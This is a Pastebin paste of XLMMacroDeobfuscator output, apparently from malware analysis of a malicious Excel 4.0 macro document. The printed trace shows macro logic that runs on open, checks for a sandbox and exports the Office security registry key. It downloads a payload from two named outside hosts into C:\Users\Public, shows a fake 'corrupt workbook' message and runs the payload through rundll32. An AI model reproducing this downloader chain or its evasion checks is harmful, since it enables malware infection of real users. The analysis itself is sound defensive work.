API tools faq
paste
Advertisement
dissectmalware

extracted macro

dissectmalware
May 23rd, 2020
675
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.89 KB | None | 0 0
raw download clone embed print report
  1.  
  2. _ _______
  3. |\ /|( \ ( )
  4. ( \ / )| ( | () () |
  5. \ (_) / | | | || || |
  6. ) _ ( | | | |(_)| |
  7. / ( ) \ | | | | | |
  8. ( / \ )| (____/\| ) ( |
  9. |/ \|(_______/|/ \|
  10. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  11. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  12. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  13. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  14. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  15. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  16. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  17. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  18.  
  19.  
  20. XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  21.  
  22. File: C:\Users\user\Downloads\1c95961c6b8bb6ce087116dcb2452258cc0c7b8e38883e5dc46cf001b3685545
  23.  
  24. [Loading Cells]
  25. auto_open: auto_open->ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!$FR$46752
  26. [Starting Deobfuscation]
  27. CELL:FR46752 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GM38479)
  28. CELL:FR46753 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AW47751)
  29. CELL:AW47751 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AH63704)
  30. CELL:AW47752 , FullEvaluation , GOTO(HD15139)
  31. CELL:HD15139 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BR18638)
  32. CELL:HD15140 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GR54551)
  33. CELL:GR54551 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HR28140)
  34. CELL:GR54552 , FullEvaluation , GOTO(FJ17553)
  35. CELL:FJ17553 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FW38376)
  36. CELL:FJ17554 , FullEvaluation , GOTO(AF3773)
  37. CELL:AF3773 , FullEvaluation , FORMULA("=CLOSE(FALSE)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EB49332)
  38. CELL:AF3774 , FullEvaluation , GOTO(CT18705)
  39. CELL:CT18705 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CT18706)
  40. CELL:CT18706 , NotImplemented , APP.MAXIMIZE()
  41. CELL:CT18707 , FullEvaluation , GOTO(AS19863)
  42. CELL:AS19863 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[29468]C[87]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AS19864)
  43. CELL:AS19864 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[29468]C[87]),)
  44. CELL:AS19865 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!R56527)
  45. CELL:R56527 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-7196]C[114]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!R56528)
  46. CELL:R56528 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-7196]C[114]))
  47. CELL:R56529 , FullEvaluation , GOTO(HK26600)
  48. CELL:HK26600 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[22731]C[-87]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HK26601)
  49. CELL:HK26601 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[22731]C[-87]),)
  50. CELL:HK26602 , FullEvaluation , GOTO(AJ7450)
  51. CELL:AJ7450 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[41881]C[96]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AJ7451)
  52. CELL:AJ7451 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[41881]C[96]),)
  53. CELL:AJ7452 , FullEvaluation , GOTO(EK61293)
  54. CELL:EK61293 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-11962]C[-9]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EK61294)
  55. CELL:EK61294 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-11962]C[-9]),)
  56. CELL:EK61294 , FullEvaluation , [TRUE] GOTO(R[-11962]C[-9])
  57. CELL:EB49332 , End , CLOSE(FALSE)
  58. CELL:EK61294 , FullEvaluation , [FALSE]
  59. CELL:EK61295 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DZ2438)
  60. CELL:DZ2438 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[46893]C[2]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DZ2439)
  61. CELL:DZ2439 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[46893]C[2]),)
  62. CELL:DZ2439 , FullEvaluation , [TRUE] GOTO(R[46893]C[2])
  63. CELL:EB49332 , End , CLOSE(FALSE)
  64. CELL:DZ2439 , FullEvaluation , [FALSE]
  65. CELL:DZ2440 , FullEvaluation , GOTO(X52802)
  66. CELL:X52802 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-3471]C[108]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!X52803)
  67. CELL:X52803 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-3471]C[108]))
  68. CELL:X52804 , FullEvaluation , GOTO(AH63311)
  69. CELL:AH63311 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-13980]C[98]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AH63312)
  70. CELL:AH63312 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-13980]C[98]))
  71. CELL:AH63313 , FullEvaluation , GOTO(GF60843)
  72. CELL:GF60843 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-11512]C[-56]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GF60844)
  73. CELL:GF60844 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-11512]C[-56]))
  74. CELL:GF60845 , FullEvaluation , GOTO(GI38395)
  75. CELL:GI38395 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EL27848)
  76. CELL:GI38396 , FullEvaluation , GOTO(DR63558)
  77. CELL:DR63558 , FullEvaluation , FORMULA("=""C:\Users\Public\wtc2ww4T.reg""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DM32005)
  78. CELL:DR63559 , FullEvaluation , GOTO(DG40898)
  79. CELL:DG40898 , FullEvaluation , FORMULA("=R[-11208]C[-107]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-7051]C[-132]&"" /y""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IO39056)
  80. CELL:DG40899 , FullEvaluation , GOTO(HA24365)
  81. CELL:HA24365 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AB40744)
  82. CELL:HA24366 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DE20488)
  83. CELL:DE20488 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[20255]C[-81],R[18567]C[140],0,5)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DE20489)
  84. CELL:DE20489 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",GET.WORKSPACE(2)\Excel\Security /y,0,5)
  85. CELL:DE20490 , FullEvaluation , GOTO(AK37585)
  86. CELL:AK37585 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-5583]C[80])))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37588)
  87. CELL:AK37586 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37589)
  88. CELL:AK37587 , FullEvaluation , FORMULA("=NEXT()",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37590)
  89. CELL:AK37588 , PartialEvaluation , WHILE("C:\Users\Public\wtc2ww4T.reg")
  90. CELL:AK37589 , PartialEvaluation , WAIT("NOW()+""00:00:01""")
  91. CELL:AK37590 , PartialEvaluation , NEXT()
  92. CELL:AK37591 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CJ49023)
  93. CELL:CJ49023 , FullEvaluation , FORMULA("=FOPEN(R[-17019]C[29])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CJ49024)
  94. CELL:CJ49024 , PartialEvaluation , FOPEN("C:\Users\Public\wtc2ww4T.reg")
  95. CELL:CJ49025 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!B25789)
  96. CELL:B25789 , FullEvaluation , FORMULA("=FPOS(R[23234]C[86],215)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!B25790)
  97. CELL:B25790 , PartialEvaluation , FPOS("C:\Users\Public\wtc2ww4T.reg",215)
  98. CELL:B25791 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DI2879)
  99. CELL:DI2879 , FullEvaluation , FORMULA("=FREAD(R[46144]C[-25],255)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DI2880)
  100. CELL:DI2880 , PartialEvaluation , FREAD("C:\Users\Public\wtc2ww4T.reg",255)
  101. CELL:DI2881 , FullEvaluation , GOTO(J32571)
  102. CELL:J32571 , FullEvaluation , FORMULA("=FCLOSE(R[16452]C[78])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!J32572)
  103. CELL:J32572 , PartialEvaluation , FCLOSE("C:\Users\Public\wtc2ww4T.reg")
  104. CELL:J32573 , FullEvaluation , GOTO(HD11908)
  105. CELL:HD11908 , FullEvaluation , FORMULA("=FILE.DELETE(R[20096]C[-95])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HD11909)
  106. CELL:HD11909 , NotImplemented , FILE.DELETE(R[20096]C[-95])
  107. CELL:HD11910 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM17958)
  108. CELL:AM17958 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-15079]C[74])),GOTO(R[31373]C[93]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM17959)
  109. CELL:AM17959 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-15079]C[74])),GOTO(R[31373]C[93]),)
  110. CELL:AM17960 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!A42769)
  111. CELL:A42769 , FullEvaluation , FORMULA("=""C:\Users\Public\v1grGU1.html""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!S26970)
  112. CELL:A42770 , FullEvaluation , GOTO(CK56936)
  113. CELL:CK56936 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GN29930)
  114. CELL:CK56937 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GB25454)
  115. CELL:GB25454 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[4475]C[12],R[1515]C[-165],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GB25455)
  116. CELL:GB25455 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\v1grGU1.html",0,0)
  117. CELL:GB25456 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CB39286)
  118. CELL:CB39286 , FullEvaluation , FORMULA("=FILES(R[-12317]C[-61])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CB39287)
  119. CELL:CB39287 , PartialEvaluation , FILES("C:\Users\Public\v1grGU1.html")
  120. CELL:CB39288 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EX62675)
  121. CELL:EX62675 , FullEvaluation , FORMULA("=IF(ISERROR(R[-23389]C[-74]),GOTO(R[-13344]C[-22]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EX62676)
  122. CELL:EX62676 , FullBranching , IF(ISERROR(R[-23389]C[-74]),GOTO(R[-13344]C[-22]),)
  123. CELL:EX62676 , FullEvaluation , [TRUE] GOTO(R[-13344]C[-22])
  124. CELL:EB49332 , End , CLOSE(FALSE)
  125. CELL:EX62676 , FullEvaluation , [FALSE]
  126. CELL:EX62677 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!Z22543)
  127. CELL:Z22543 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM38736)
  128. CELL:Z22544 , FullEvaluation , GOTO(HK9570)
  129. CELL:HK9570 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DH15310)
  130. CELL:HK9571 , FullEvaluation , GOTO(GX34325)
  131. CELL:GX34325 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FA53097)
  132. CELL:GX34326 , FullEvaluation , GOTO(GB11054)
  133. CELL:GB11054 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AS6496)
  134. CELL:GB11055 , FullEvaluation , GOTO(HI50545)
  135. CELL:HI50545 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FB46246)
  136. CELL:HI50546 , FullEvaluation , GOTO(DJ57354)
  137. CELL:DJ57354 , FullEvaluation , FORMULA("=""C:\Users\Public\qaaGrR.html""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EN33297)
  138. CELL:DJ57355 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GH65453)
  139. CELL:GH65453 , FullEvaluation , FORMULA("=""http://9dani.com/wp-keys.php""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HJ48131)
  140. CELL:GH65454 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BA58221)
  141. CELL:BA58221 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[15348]C[172],R[514]C[98],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AT32783)
  142. CELL:BA58222 , FullEvaluation , GOTO(BL32900)
  143. CELL:BL32900 , FullEvaluation , FORMULA("=FILES(R[30511]C[68])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BX2786)
  144. CELL:BL32901 , FullEvaluation , GOTO(I43306)
  145. CELL:I43306 , FullEvaluation , FORMULA("=IF(ISERROR(R[-17912]C[67]),,RUN(R[2015]C[221]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!I20698)
  146. CELL:I43307 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CS63959)
  147. CELL:CS63959 , FullEvaluation , FORMULA("=""https://scsanwei.cn/wp-keys.php""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BH52763)
  148. CELL:CS63960 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GZ44453)
  149. CELL:GZ44453 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[17023]C[-64],R[-2443]C[20],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DT35740)
  150. CELL:GZ44454 , FullEvaluation , GOTO(BU55359)
  151. CELL:BU55359 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EC53342)
  152. CELL:BU55360 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BG27079)
  153. CELL:BG27079 , FullEvaluation , FORMULA("=ALERT(R[30629]C[-97])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
  154. CELL:BG27080 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CX17523)
  155. CELL:CX17523 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
  156. CELL:CX17524 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DQ59477)
  157. CELL:DQ59477 , FullEvaluation , FORMULA("=R[-23286]C[132]&"",DllRegisterServer""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!L56583)
  158. CELL:DQ59478 , FullEvaluation , GOTO(EI28324)
  159. CELL:EI28324 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-1940]C[-243],R[53470]C[-239],0,5)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
  160. CELL:EI28325 , FullEvaluation , GOTO(AT32783)
  161. CELL:AT32783 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://9dani.com/wp-keys.php","C:\Users\Public\qaaGrR.html",0,0)
  162. CELL:AT32784 , FullEvaluation , GOTO(BX2786)
  163. CELL:BX2786 , PartialEvaluation , FILES("C:\Users\Public\qaaGrR.html")
  164. CELL:BX2787 , FullEvaluation , GOTO(I20698)
  165. CELL:I20698 , FullBranching , IF(ISERROR(R[-17912]C[67]),,RUN(R[2015]C[221]))
  166. CELL:I20698 , FullEvaluation , [TRUE]
  167. CELL:I20699 , FullEvaluation , GOTO(BH52763)
  168. CELL:BH52763 , FullEvaluation , "https://scsanwei.cn/wp-keys.php"
  169. CELL:BH52764 , FullEvaluation , GOTO(DT35740)
  170. CELL:DT35740 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://scsanwei.cn/wp-keys.php","C:\Users\Public\qaaGrR.html",0,0)
  171. CELL:DT35741 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EC53342)
  172. CELL:EC53342 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  173. CELL:EC53343 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
  174. CELL:HV22713 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  175. CELL:HV22714 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
  176. CELL:H1173 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  177. CELL:H1174 , FullEvaluation , GOTO(L56583)
  178. CELL:L56583 , FullEvaluation , C:\Users\Public\qaaGrR.html,DllRegisterServer
  179. CELL:L56584 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
  180. CELL:IQ3113 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\qaaGrR.html,DllRegisterServer",0,5)
  181. CELL:IQ3114 , FullEvaluation , GOTO(EB49332)
  182. CELL:EB49332 , End , CLOSE(FALSE)
  183. CELL:I20698 , FullEvaluation , [FALSE] RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
  184. CELL:HV22713 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  185. CELL:HV22714 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
  186. CELL:H1173 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  187. CELL:H1174 , FullEvaluation , GOTO(L56583)
  188. CELL:L56583 , FullEvaluation , C:\Users\Public\qaaGrR.html,DllRegisterServer
  189. CELL:L56584 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
  190. CELL:IQ3113 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\qaaGrR.html,DllRegisterServer",0,5)
  191. CELL:IQ3114 , FullEvaluation , GOTO(EB49332)
  192. CELL:EB49332 , End , CLOSE(FALSE)
  193. [END of Deobfuscation]
  194. time elapsed: 4.695186376571655
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!